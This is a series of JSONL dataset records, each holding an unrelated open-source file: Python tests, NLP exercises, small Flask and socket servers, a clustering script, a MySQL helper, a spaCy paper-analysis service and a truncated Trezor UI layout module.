pytest.raises(ClientError, match=error_message):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\ndef test_exceptions_in_all_device_regions(aws_session):\n device_arn = \"arn:aws:braket:::device/qpu/test/device-name\"\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n ),\n ClientError(\n {\n \"Error\": {\n \"Code\": \"SomeOtherErrorMessage\",\n }\n },\n \"getDevice\",\n ),\n ]\n\n error_message = (\n \"An error occurred \\\\(SomeOtherErrorMessage\\\\) \"\n \"when calling the getDevice operation: Unknown\"\n )\n with pytest.raises(ClientError, match=error_message):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\n@patch(\"braket.aws.aws_quantum_job.AwsSession\")\ndef test_initialize_session_local_device(mock_new_session, aws_session):\n logger = logging.getLogger(__name__)\n device = 
\"local:provider.device.name\"\n # don't change a provided AwsSession\n assert AwsQuantumJob._initialize_session(aws_session, device, logger) == aws_session\n # otherwise, create an AwsSession with the profile defaults\n assert AwsQuantumJob._initialize_session(None, device, logger) == mock_new_session()\n\n\ndef test_bad_device_arn_format(aws_session):\n logger = logging.getLogger(__name__)\n device_not_found = (\n \"Device ARN is not a valid format: bad-arn-format. For valid Braket ARNs, \"\n \"see 'https://docs.aws.amazon.com/braket/latest/developerguide/braket-devices.html'\"\n )\n\n with pytest.raises(ValueError, match=device_not_found):\n AwsQuantumJob._initialize_session(aws_session, \"bad-arn-format\", logger)\n","repo_name":"amazon-braket/amazon-braket-sdk-python","sub_path":"test/unit_tests/braket/aws/test_aws_quantum_job.py","file_name":"test_aws_quantum_job.py","file_ext":"py","file_size_in_byte":34394,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"72"} +{"seq_id":"25414352655","text":"# coding: utf-8\nfrom __future__ import division, print_function, unicode_literals\nimport sys\nimport re\nfrom operator import itemgetter\nimport codecs\nimport random\n\n\ndef set_encoding(enc='utf_8'):\n sys.stdin = codecs.getreader(enc)(sys.stdin)\n sys.stdout = codecs.getwriter(enc)(sys.stdout)\n sys.stderr = codecs.getwriter(enc)(sys.stderr)\n\n\ndef proc0():\n s = 'stressed'\n t = s[::-1]\n print('t = ' + t)\n\n\ndef proc1():\n s = 'パタトクカシーー'\n t = s[1::2]\n print('t = ' + t)\n\n\ndef proc2():\n s = 'パトカー'\n t = 'タクシー'\n u = ''.join(s[i] + t[i] for i in xrange(len(s)))\n print('u = ' + u)\n\n\ndef proc3():\n s = 'Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics.'\n ss = s.split(' ')\n t = [len(re.sub('\\W', '', w)) for w in ss]\n print('repr(t) = ' + repr(t))\n\n\ndef proc4():\n s = 'Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. 
Arthur King Can.'\n    a = map(lambda x: x - 1, [1, 5, 6, 7, 8, 9, 15, 16, 19])\n    m = {}\n    for i, ss in enumerate(s.split(' ')):\n        if i in a:\n            m[ss[:1]] = i + 1\n        else:\n            m[ss[:2]] = i + 1\n    l = [item for item in m.iteritems()]\n    l.sort(key=itemgetter(1))\n    print(repr(l))\n\n\ndef proc5():\n    s = raw_input('> ')\n    n = 2\n    print('# word {}-gram #'.format(n))\n    print(repr(word_n_gram(s, n)))\n    print('# char {}-gram #'.format(n))\n    print(repr(char_n_gram(s, n)))\n\n\ndef char_n_gram(s, n):\n    return [s[i:i + n] for i in xrange(len(s) - n + 1)]\n\n\ndef word_n_gram(s, n, delim=' '):\n    ws = s.split(delim)\n    return [ws[i:i + n] for i in xrange(len(ws) - n + 1)]\n\n\ndef proc6():\n    s = 'paraparaparadise'\n    t = 'paragraph'\n    X = set(char_n_gram(s, 2))\n    Y = set(char_n_gram(t, 2))\n    print('X & Y = ' + repr(X & Y))\n    print('X | Y = ' + repr(X | Y))\n    print('X - Y = ' + repr(X - Y))\n    print('\"se\" in X = ' + repr(u\"se\" in X))\n    print('\"se\" in Y = ' + repr(u\"se\" in Y))\n\n\ndef proc7():\n    def fn(x, y, z):\n        return '{}時の{}は{}'.format(x, y, z)\n\n    print(fn(12, '気温', 22.4))\n\n\ndef proc8():\n    text = raw_input('> ')\n\n    def cipher(s):\n        def repl(c):\n            if re.match(r'\\w', c):\n                return chr(219 - ord(c))\n            return c\n\n        return ''.join(repl(c) for c in s)\n\n    print(cipher(text))\n\n\ndef proc9():\n    text = raw_input('> ')\n\n    def typoglycemia(s):\n        ret = []\n        for ss in s.split(' '):\n            if len(ss) < 4:\n                ret.append(ss)\n                continue\n            t = list(ss)[1:-1]\n            random.shuffle(t)\n            ret.append(ss[0] + ''.join(t) + ss[-1])\n        return ' '.join(ret)\n\n    print(typoglycemia(text))\n\n\ndef main():\n    if len(sys.argv) < 2:\n        print('usage: python {} NUM'.format(sys.argv[0]), file=sys.stderr)\n        sys.exit(1)\n    num = int(sys.argv[1])\n    eval('proc{}()'.format(num))\n\n\nif __name__ == '__main__':\n    set_encoding()\n    main()\n","repo_name":"arosh/nlp100-2015","sub_path":"chapter1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18196334656","text":"# from..config import Config\n# from app.cache.redis_cache import Redis\n\n\n\n# static_file_cache\n# db_cache\n\nclass ModelCache:\n    \"\"\"\n    \"\"\"\n\n    def __init__(self, model:object, cache_schema:object):\n        \"\"\"\n        \"\"\"\n        model_name = model.__name__\n        model_data = {}\n        for model_row in model.query.all():\n            model_data.update({\n                str(model_row.id): model_row.to_json()\n            })\n        self.model = {\n            model_name: model_data\n        }\n        print(self.model)\n","repo_name":"BonkaNyde/bat_cave","sub_path":"app/cache/cache_manager.py","file_name":"cache_manager.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36151689314","text":"import socket\nimport codecs\n\n\nclass ServerSocket:\n\n    def __init__(self):\n        self.runServer = True\n\n    def initServer(self):\n        HOST = 'localhost'\n        PORT = 8080\n        barcode = ''\n        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:\n            print('\\nIniciando el servidor socket..')\n            result = ''\n            # 10 secs of utility, after that the socket dies.\n            server.settimeout(10)\n            # If another socket is still bound to the address this socket is\n            # going to use, the old socket goes into a waiting state and lets\n            # this socket reuse the address. 
👍\n try:\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n except Exception:\n pass\n server.bind((HOST, PORT))\n print(f'\\nconectado al host: { HOST }')\n print(f'conectado al puerto: { PORT }\\n')\n server.listen(1)\n try:\n conn, addr = server.accept()\n with conn:\n print('Conectado con: ', addr)\n while conn:\n data = conn.recv(4096)\n if data:\n conn.send(b'1')\n if not data:\n break\n result = codecs.decode(data)\n barcode = result\n print(f'Barcode: {result}')\n\n except socket.timeout:\n print('Socket server timeout')\n\n print('Servidor socket apagado.\\n')\n server.close()\n return barcode\n\n def disconnectServer(self):\n self.runServer = False\n","repo_name":"Pedro-Nicolas-Rios-Vargas/BCScript","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17144800209","text":"import numpy as np\nfrom typing import List, Tuple\nfrom dataclasses import dataclass\nfrom abc import ABC, abstractmethod\n\n\n@dataclass\nclass TrainingSample:\n \"\"\" Sample for training \"\"\"\n\n current_state: np.ndarray = np.array(\n []\n ) # set of images concatenated along axis-2 (h x w x n)\n action: int = -1 # action taken by network for current_state\n reward: float = 0 # reward rxd for action\n last_episode_state: bool = False # if true, episode ended because of action taken in the current state\n next_state: np.ndarray = np.array([]) # next state after taking action\n\n\nclass Network(ABC):\n \"\"\" Base class for all networks \"\"\"\n\n @abstractmethod\n def init(\n self,\n input_shape: Tuple[int],\n num_actions: int,\n discount_factor: float,\n tb_logdir: str,\n env_action_space: List[int],\n tb_writer,\n ):\n assert False\n\n @abstractmethod\n def predict(\n self,\n state: List[np.ndarray],\n convert_to_openai_action_space=True,\n predict_all_actions=False,\n ):\n \"\"\" if predict_all_actions is true, it returns the output of the network directly (np.ndarray(num_actions), else it returns a single number corresponding to the action with the largest Q value)\"\"\"\n assert False\n\n @abstractmethod\n def train(self, batch_idx: int, batch: List[TrainingSample]):\n assert False\n\n @abstractmethod\n def save(self, chkpt_folder, epi_cnt):\n \"\"\" saves the checkpoint \"\"\"\n assert False\n","repo_name":"acharyahemanth/RL-atari","sub_path":"networks/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6760539411","text":"import logging\n\nfrom aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import Message\nfrom tg_bot.dialog_states.questions_box_states import QuestionsBoxDialog\nfrom tg_bot.users import User, users\n\n\nclass QuestionsBoxService:\n def __init__(self):\n pass\n\n async def save_questions(self, message: Message, state: FSMContext):\n answer = message.text\n user = message.from_user.id\n\n if user not in users:\n users[user] = User(user_questions=[answer])\n\n else:\n users[user].user_questions.append(answer)\n\n await state.finish()\n\n await message.answer(text=f\"Answer saved {users[user].user_questions}\",\n parse_mode=\"HTML\")\n\n async def request_question(self, message: Message):\n await message.answer(text=\"Задайте вопрос\", parse_mode=\"HTML\")\n\n await 
QuestionsBoxDialog.question.set()\n","repo_name":"KuranovaPolina/suai-bot-student-telegram-client","sub_path":"tg_bot/handlers/questions_box.py","file_name":"questions_box.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20685523467","text":"from flask import Flask, request, send_from_directory\r\nfrom flask_cors import CORS, cross_origin\r\n\r\napp = Flask(__name__, static_folder='GrammarChecker/build', static_url_path='')\r\nCORS(app)\r\n\r\n@app.route(\"/\")\r\n@cross_origin()\r\ndef serve():\r\n    return send_from_directory(app.static_folder, 'index.html')\r\n\r\n@app.route(\"/incomingData\", methods=['POST'])\r\n@cross_origin()\r\ndef data():\r\n    import spellcheck\r\n    request_data=request.get_json()\r\n    data=request_data['data']\r\n    res=spellcheck.correct_word_spelling(data)\r\n    ans=''\r\n    for i in res:\r\n        ans+=i\r\n        ans+=\" \"\r\n    return ans\r\n\r\nif __name__ == '__main__':\r\n    app.run(host=\"0.0.0.0\", port=5000, debug=True, threaded=True)","repo_name":"NaK915/Spell-Checker","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10962163478","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 3 22:25:52 2020\r\n\r\n@author: Giovanni\r\n\"\"\"\r\n\r\n# Clustering with the K-medoids algorithm\r\n# this algorithm picks real points that already exist in the dataset\r\n\r\n#pip install pyclustering\r\n\r\nfrom sklearn import datasets\r\nfrom sklearn.metrics import confusion_matrix\r\nimport numpy as np\r\nfrom pyclustering.cluster.kmedoids import kmedoids \r\nfrom pyclustering.cluster import cluster_visualizer\r\n\r\niris = datasets.load_iris()\r\n\r\n# we will work with the clustering of attributes 0 and 1 \r\n# since this visualization function only lets us see two attributes \r\n\r\ncluster = kmedoids(iris.data[:,0:2], [3,12,20])\r\n    # data[all rows, columns 0 and 1]\r\n    # [3,12,20] = initial_index_medoid = indices of the points in the dataset used to initialize the medoids\r\n    # it is common to just use random points, it does not make much difference \r\ncluster.get_medoids() \r\n    # Out[21]: [3, 12, 20] \r\ncluster.process()\r\n    # the process function does the training, or rather, the clustering \r\nprevisoes = cluster.get_clusters()\r\n\r\nmedoids = cluster.get_medoids()\r\n    # we found points 7, 67 and 112, which are our true medoids \r\n\r\n# Cluster visualization:\r\nv = cluster_visualizer()\r\nv.append_clusters(previsoes, iris.data[:,0:2])\r\nv.append_cluster(medoids, iris.data[:,0:2], marker='*', markersize=15) # to mark with a star where the medoids are \r\nv.show()\r\n\r\n# Comparison to check the hits: \r\n    # We need to do some manual coding to generate a variable in the iris.target format\r\n    # in order to use confusion_matrix:\r\nlista_previsoes = []\r\nlista_real = []\r\nfor i in range(len(previsoes)):\r\n    print('-----')\r\n    print(i)\r\n    print('-----')\r\n    \r\n    for j in range(len(previsoes[i])):\r\n        #print(j)\r\n        print(previsoes[i][j])\r\n        lista_previsoes.append(i) \r\n        lista_real.append(iris.target[previsoes[i][j]])\r\n        \r\n# Converting these two lists to the numpy array format\r\nlista_previsoes = np.asarray(lista_previsoes)\r\nlista_real = np.asarray(lista_real)\r\n\r\nresultados = confusion_matrix(lista_real, lista_previsoes)\r\n    # we count 26 errors 
","repo_name":"GiovanniBru/Data-Science","sub_path":"testes python/24_agrupamento_kmedoids.py","file_name":"24_agrupamento_kmedoids.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41655679487","text":"# -*- coding: utf-8 -*-\nimport MySQLdb\nimport config\n\nclass JediMaster:\n def __init__(self):\n self.db = {}\n self.jedi = MySQLdb.connect(u\"localhost\", config.user, config.password)\n self.set_encoding(self.jedi)\n\n def get_database(self, database = None):\n if not database: return self.jedi\n if database not in self.db:\n self.db[database] = MySQLdb.connect(u\"localhost\", config.user, config.password, database)\n self.set_encoding(self.db[database])\n return self.db[database]\n\n def set_encoding(self, db):\n db.set_character_set('utf8')\n cursor = db.cursor()\n cursor.execute(u'SET NAMES utf8;')\n cursor.execute(u'SET CHARACTER SET utf8;')\n cursor.execute(u'SET character_set_connection=utf8;')\n\n def create_database(self, db):\n cursor = self.get_database().cursor()\n cursor.execute(u\"CREATE DATABASE IF NOT EXISTS {} DEFAULT CHARACTER SET utf8 DEFAULT COLLATE utf8_general_ci\".format(db))\n\n def create_table(self, database, table, columns):\n cursor = self.get_database(database).cursor()\n for i in xrange(len(columns)): columns[i] = u\" \".join(columns[i])\n columns = u\", \".join(columns)\n command = u\"CREATE TABLE IF NOT EXISTS {} ({})\".format(table, columns)\n cursor.execute(command)\n\n def insert_column(self, database, table, column):\n cursor = self.get_database(database).cursor()\n s = u\", \".join([u\"%s\"] * len(column))\n cursor.execute(u\"INSERT INTO {} VALUES ({})\".format(table, s), column)\n\n def insert_column_custom(self, database ,table, column):\n cursor = self.get_database(database).cursor()\n key = []\n value = []\n for k in column.keys():\n key.append(k)\n value.append(u\"%({})s\".format(k))\n key = \", \".join(key)\n value = \", \".join(value)\n cursor.execute(u\"INSERT INTO {} ({}) VALUES ({})\".format(table, key, value), column)\n\n def execute(self, database, query):\n cursor = self.get_database(database).cursor()\n cursor.execute(query)\n return cursor.fetchall()\n\n def commit(self, database):\n db = self.get_database(database)\n db.commit()\n","repo_name":"oalieno/JediSQL","sub_path":"JediSQL.py","file_name":"JediSQL.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"12861080206","text":"from collections import deque\n\ndef solution(skill, skill_trees):\n skillList = set(skill)\n cnt = 0\n\n for st in skill_trees:\n tmpStr = ''\n st = deque(list(st))\n while st: # 순서에 있는 스킬들만 뽑아서 찍어본다\n tmpChar = st.popleft()\n if tmpChar in skillList:\n tmpStr += tmpChar\n\n idx = 0\n while idx < len(tmpStr): # 내가 찍은 스킬트리와 스킬 순서를 앞부터 한글자 씩 비교\n if skill[idx] != tmpStr[idx]:\n break\n idx += 1\n else:\n cnt += 1\n\n return cnt\n\nif __name__ == \"__main__\":\n skill, skill_trees = \"CBD\", [\"BACDE\", \"CBADF\", \"AECB\", \"BDA\"]\n print(solution(skill, skill_trees)) # 2","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/Programmers/스킬트리/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31767650967","text":"import numpy as np\n\nfrom tf_from_sql.db import SensorLogEntry, Session\n\n\ndef 
create_samples_from_db() -> tuple[np.ndarray, np.ndarray]:\n session = Session()\n session_log_entries = list(session.query(SensorLogEntry))\n\n num_sensors = 2 # sensors ids are in range(num_sensors)\n num_events = 3 # event ids are in range(num_events)\n\n # features\n X = np.zeros((len(session_log_entries), num_sensors), dtype=\"float32\")\n # labels\n Y_true = np.zeros((len(session_log_entries), num_events), dtype=\"float32\")\n for i, session_log_entry in enumerate(session_log_entries):\n # one-hot encoding of features and labels\n X[i, session_log_entry.sensor] = 1.0\n Y_true[i, session_log_entry.event] = 1.0\n\n return X, Y_true\n","repo_name":"AlexElvers/tf-from-sql","sub_path":"tf_from_sql/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38842273050","text":"from flask import Flask, jsonify\nfrom flask import request\nfrom Bio import Entrez\nfrom spacy.matcher import Matcher\nimport spacy\nfrom age_matcher import get_age\nfrom analyte_matcher import load_analytes\nfrom analyte_matcher import get_analytes\nfrom analyte_matcher import createMatcher\nfrom omic_matcher import createMetaboliteMatcher\nfrom control_group_matcher import get_control_groups, get_healthy_control_groups\nfrom fluid_matcher import get_fluids\nfrom n_matcher import get_n\nfrom omic_matcher import get_omics, load_metabolites\nfrom sex_matcher import get_sexes\n\nnlp = spacy.load(\"en_core_web_trf\")\ntest = spacy.load(\"en_ner_bionlp13cg_md\")\n\nemail = ''\nmetabolite_list = load_metabolites('metabolites.csv')\nanalyte_list = load_analytes('analytes.csv')\nanaylte_matcher = createMatcher(nlp, analyte_list)\nmetabolite_matcher = createMetaboliteMatcher(nlp, metabolite_list)\n\napp = Flask(__name__)\n\n@app.route('/paper')\ndef papers():\n doi = request.args.get('doi')\n pmid = request.args.get('pmid')\n Entrez.email = email\n if(doi):\n handle = Entrez.esearch(db=\"pubmed\", term=doi, retmax=100)\n record = Entrez.read(handle)\n id = record['IdList']\n handle.close()\n else:\n id = pmid\n handle = Entrez.elink(dbfrom=\"pubmed\", db=\"pmc\", linkname=\"pubmed_pmc\", id=''.join(id), retmode=\"xml\")\n id_return = Entrez.read(handle)\n handle.close()\n handle = Entrez.efetch(db=\"pmc\", id=id_return[0]['LinkSetDb'][0]['Link'][0]['Id']) \n records = handle.read()\n handle.close()\n results = []\n text = nlp(records.decode(\"utf-8\").replace('\\n', ' '))\n potential_n = get_n(nlp, text)\n umlstext = test(text)\n potential_sexes = get_sexes(nlp, text)\n potential_fluids = get_fluids(nlp, text)\n potential_omics = get_omics(nlp, text)\n potential_ages = get_age(nlp, text)\n potential_control_groups = get_control_groups(nlp, text)\n potential_healthy_control_groups = get_healthy_control_groups(nlp, text)\n potential_analytes = get_analytes(nlp, text, analyte_list)\n results.append({\n 'doi': doi,'input': [t.text for t in text], \n 'size': [{'start':item.start, 'end': item.end} for item in potential_n], \n 'fluids':[{'start':item.start, 'end': item.end} for item in potential_fluids], \n 'sexes':[{'start':item.start, 'end': item.end} for item in potential_sexes], \n 'ages':[{'start':item.start, 'end': item.end} for item in potential_ages],\n 'omics':[{'start':item.start, 'end': item.end} for item in potential_omics],\n 'controlGroups': [{'start':item.start, 'end': item.end} for item in potential_control_groups],\n 'healthyControlGroups': [{'start':item.start, 'end': item.end} for item in 
potential_healthy_control_groups],\n        'analytes': [{'start':item.start, 'end': item.end} for item in potential_analytes],\n        'umls': [{'start': item.start, 'end': item.end, 'label': item.label_, 'text': item.text} for item in umlstext.ents],\n    })\n    return '<br>'.join(results)\n\n@app.route(\"/abstract\")\ndef entrance():\n    doi = request.args.get('doi')\n    pmid = request.args.get('pmid')\n    print(pmid, flush=True)\n    dois = str(doi).split(',')\n    abstract_dict = {}\n    without_abstract = []\n    Entrez.email = email\n    if (doi):\n        handle = Entrez.esearch(db=\"pubmed\", term=' OR '.join(dois), retmax=100)\n        record = Entrez.read(handle)\n        ids = record['IdList']\n        handle.close()\n    else:\n        ids = pmid.split(',')\n    handle = Entrez.efetch(db=\"pubmed\", id=','.join(ids),rettype=\"xml\", retmode=\"text\")\n    records = Entrez.read(handle)\n    for pubmed_article in records['PubmedArticle']:\n        pmid = int(str(pubmed_article['MedlineCitation']['PMID']))\n        article = pubmed_article['MedlineCitation']['Article']\n        if 'Abstract' in article:\n            abstract = ' '.join(article['Abstract']['AbstractText']).replace(',', '')\n            abstract_dict[pmid] = abstract.encode(\"ascii\", \"ignore\").decode()\n        else:\n            without_abstract.append(pmid)\n    handle.close()\n    results = []\n    for key, abstract in abstract_dict.items():\n        text = nlp(abstract)\n        umlstext = test(abstract)\n        potential_n = get_n(nlp, text)\n        potential_sexes = get_sexes(nlp, text)\n        potential_fluids = get_fluids(nlp, text)\n        potential_omics = get_omics(nlp, text, metabolite_matcher)\n        potential_ages = get_age(nlp, text)\n        potential_control_groups = get_control_groups(nlp, text)\n        potential_healthy_control_groups = get_healthy_control_groups(nlp, text)\n        potential_analytes = get_analytes(text, anaylte_matcher)\n        results.append({\n            'doi': key,'input': [t.text for t in text], \n            'size': [{'start':item.start, 'end': item.end} for item in potential_n], \n            'fluids':[{'start':item.start, 'end': item.end} for item in potential_fluids], \n            'sexes':[{'start':item.start, 'end': item.end} for item in potential_sexes], \n            'ages':[{'start':item.start, 'end': item.end} for item in potential_ages],\n            'omics':[{'start':item.start, 'end': item.end} for item in potential_omics],\n            'controlGroups': [{'start':item.start, 'end': item.end} for item in potential_control_groups],\n            'healthyControlGroups': [{'start':item.start, 'end': item.end} for item in potential_healthy_control_groups],\n            'analytes': [{'start':item.start, 'end': item.end} for item in potential_analytes],\n            'umls': [{'start': item.start, 'end': item.end, 'label': item.label_, 'text': item.text} for item in umlstext.ents],\n        })\n    if (len(abstract_dict.items()) > 0):\n        response = jsonify(results)\n        response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n        return response\n    else:\n        return '<br><br>no abstract<br><br>'\n\n\nif __name__ == '__main__':\n    print('loading')\n    app.run(port=9090)","repo_name":"MatthewMong/paperAnalyzer","sub_path":"extraResources/backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37973308989","text":"from typing import TYPE_CHECKING\n\nfrom trezor import io, loop, ui\nfrom trezor.enums import ButtonRequestType\nfrom trezor.wire import ActionCancelled\n\nimport trezorui2\n\nfrom ..common import button_request, interact\n\nif TYPE_CHECKING:\n    from typing import Any, NoReturn, Awaitable, Iterable, Sequence, TypeVar\n\n    from trezor.wire import GenericContext, Context\n    from ..common import PropertyType, ExceptionType\n\n    T = TypeVar(\"T\")\n\n\nCONFIRMED = trezorui2.CONFIRMED\nCANCELLED = trezorui2.CANCELLED\nINFO = 
trezorui2.INFO\n\nBR_TYPE_OTHER = ButtonRequestType.Other # global_import_cache\n\n\nif __debug__:\n from trezor.utils import DISABLE_ANIMATION\n\n trezorui2.disable_animation(bool(DISABLE_ANIMATION))\n\n\nclass RustLayout(ui.Layout):\n # pylint: disable=super-init-not-called\n def __init__(self, layout: Any):\n self.layout = layout\n self.timer = loop.Timer()\n self.layout.attach_timer_fn(self.set_timer)\n\n def set_timer(self, token: int, deadline: int) -> None:\n self.timer.schedule(deadline, token)\n\n def request_complete_repaint(self) -> None:\n msg = self.layout.request_complete_repaint()\n assert msg is None\n\n def _paint(self) -> None:\n import storage.cache as storage_cache\n\n painted = self.layout.paint()\n\n ui.refresh()\n if storage_cache.homescreen_shown is not None and painted:\n storage_cache.homescreen_shown = None\n\n if __debug__:\n from trezor.enums import DebugPhysicalButton\n\n def create_tasks(self) -> tuple[loop.AwaitableTask, ...]:\n return (\n self.handle_input_and_rendering(),\n self.handle_timers(),\n self.handle_swipe_signal(),\n self.handle_button_signal(),\n self.handle_result_signal(),\n )\n\n async def handle_result_signal(self) -> None:\n \"\"\"Enables sending arbitrary input - ui.Result.\n\n Waits for `result_signal` and carries it out.\n \"\"\"\n from apps.debug import result_signal\n from storage import debug as debug_storage\n\n while True:\n event_id, result = await result_signal()\n # Layout change will be notified in _first_paint of the next layout\n debug_storage.new_layout_event_id = event_id\n raise ui.Result(result)\n\n def read_content_into(self, content_store: list[str]) -> None:\n \"\"\"Reads all the strings/tokens received from Rust into given list.\"\"\"\n\n def callback(*args: Any) -> None:\n for arg in args:\n content_store.append(str(arg))\n\n content_store.clear()\n self.layout.trace(callback)\n\n async def _press_left(self, hold_ms: int | None) -> Any:\n \"\"\"Triggers left button press.\"\"\"\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_LEFT)\n self._paint()\n if hold_ms is not None:\n await loop.sleep(hold_ms)\n return self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_LEFT)\n\n async def _press_right(self, hold_ms: int | None) -> Any:\n \"\"\"Triggers right button press.\"\"\"\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_RIGHT)\n self._paint()\n if hold_ms is not None:\n await loop.sleep(hold_ms)\n return self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_RIGHT)\n\n async def _press_middle(self, hold_ms: int | None) -> Any:\n \"\"\"Triggers middle button press.\"\"\"\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_LEFT)\n self._paint()\n self.layout.button_event(io.BUTTON_PRESSED, io.BUTTON_RIGHT)\n self._paint()\n if hold_ms is not None:\n await loop.sleep(hold_ms)\n self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_LEFT)\n self._paint()\n return self.layout.button_event(io.BUTTON_RELEASED, io.BUTTON_RIGHT)\n\n async def _press_button(\n self,\n event_id: int | None,\n btn_to_press: DebugPhysicalButton,\n hold_ms: int | None,\n ) -> Any:\n from trezor.enums import DebugPhysicalButton\n from trezor import workflow\n from apps.debug import notify_layout_change\n from storage import debug as debug_storage\n\n if btn_to_press == DebugPhysicalButton.LEFT_BTN:\n msg = await self._press_left(hold_ms)\n elif btn_to_press == DebugPhysicalButton.MIDDLE_BTN:\n msg = await self._press_middle(hold_ms)\n elif btn_to_press == DebugPhysicalButton.RIGHT_BTN:\n msg = await self._press_right(hold_ms)\n 
else:\n raise Exception(f\"Unknown button: {btn_to_press}\")\n\n if msg is not None:\n # Layout change will be notified in _first_paint of the next layout\n debug_storage.new_layout_event_id = event_id\n raise ui.Result(msg)\n\n # So that these presses will keep trezor awake\n # (it will not be locked after auto_lock_delay_ms)\n workflow.idle_timer.touch()\n\n self._paint()\n notify_layout_change(self, event_id)\n\n async def _swipe(self, event_id: int | None, direction: int) -> None:\n \"\"\"Triggers swipe in the given direction.\n\n Only `UP` and `DOWN` directions are supported.\n \"\"\"\n from trezor.enums import DebugPhysicalButton, DebugSwipeDirection\n\n if direction == DebugSwipeDirection.UP:\n btn_to_press = DebugPhysicalButton.RIGHT_BTN\n elif direction == DebugSwipeDirection.DOWN:\n btn_to_press = DebugPhysicalButton.LEFT_BTN\n else:\n raise Exception(f\"Unsupported direction: {direction}\")\n\n await self._press_button(event_id, btn_to_press, None)\n\n async def handle_swipe_signal(self) -> None:\n \"\"\"Enables pagination through the current page/flow page.\n\n Waits for `swipe_signal` and carries it out.\n \"\"\"\n from apps.debug import swipe_signal\n\n while True:\n event_id, direction = await swipe_signal()\n await self._swipe(event_id, direction)\n\n async def handle_button_signal(self) -> None:\n \"\"\"Enables clicking arbitrary of the three buttons.\n\n Waits for `button_signal` and carries it out.\n \"\"\"\n from apps.debug import button_signal\n\n while True:\n event_id, btn, hold_ms = await button_signal()\n await self._press_button(event_id, btn, hold_ms)\n\n else:\n\n def create_tasks(self) -> tuple[loop.AwaitableTask, ...]:\n return self.handle_timers(), self.handle_input_and_rendering()\n\n def _first_paint(self) -> None:\n # Clear the screen of any leftovers.\n ui.display.clear()\n self._paint()\n\n if __debug__ and self.should_notify_layout_change:\n from apps.debug import notify_layout_change\n from storage import debug as debug_storage\n\n # notify about change and do not notify again until next await.\n # (handle_rendering might be called multiple times in a single await,\n # because of the endless loop in __iter__)\n self.should_notify_layout_change = False\n\n # Possibly there is an event ID that caused the layout change,\n # so notifying with this ID.\n event_id = None\n if debug_storage.new_layout_event_id is not None:\n event_id = debug_storage.new_layout_event_id\n debug_storage.new_layout_event_id = None\n\n notify_layout_change(self, event_id)\n\n def handle_input_and_rendering(self) -> loop.Task: # type: ignore [awaitable-is-generator]\n from trezor import workflow\n\n button = loop.wait(io.BUTTON)\n self._first_paint()\n while True:\n # Using `yield` instead of `await` to avoid allocations.\n event, button_num = yield button\n workflow.idle_timer.touch()\n msg = None\n if event in (io.BUTTON_PRESSED, io.BUTTON_RELEASED):\n msg = self.layout.button_event(event, button_num)\n if msg is not None:\n raise ui.Result(msg)\n self._paint()\n\n def handle_timers(self) -> loop.Task: # type: ignore [awaitable-is-generator]\n while True:\n # Using `yield` instead of `await` to avoid allocations.\n token = yield self.timer\n msg = self.layout.timer(token)\n if msg is not None:\n raise ui.Result(msg)\n self._paint()\n\n def page_count(self) -> int:\n \"\"\"How many paginated pages current screen has.\"\"\"\n return self.layout.page_count()\n\n\ndef draw_simple(layout: Any) -> None:\n # Simple drawing not supported for layouts that set timers.\n def 
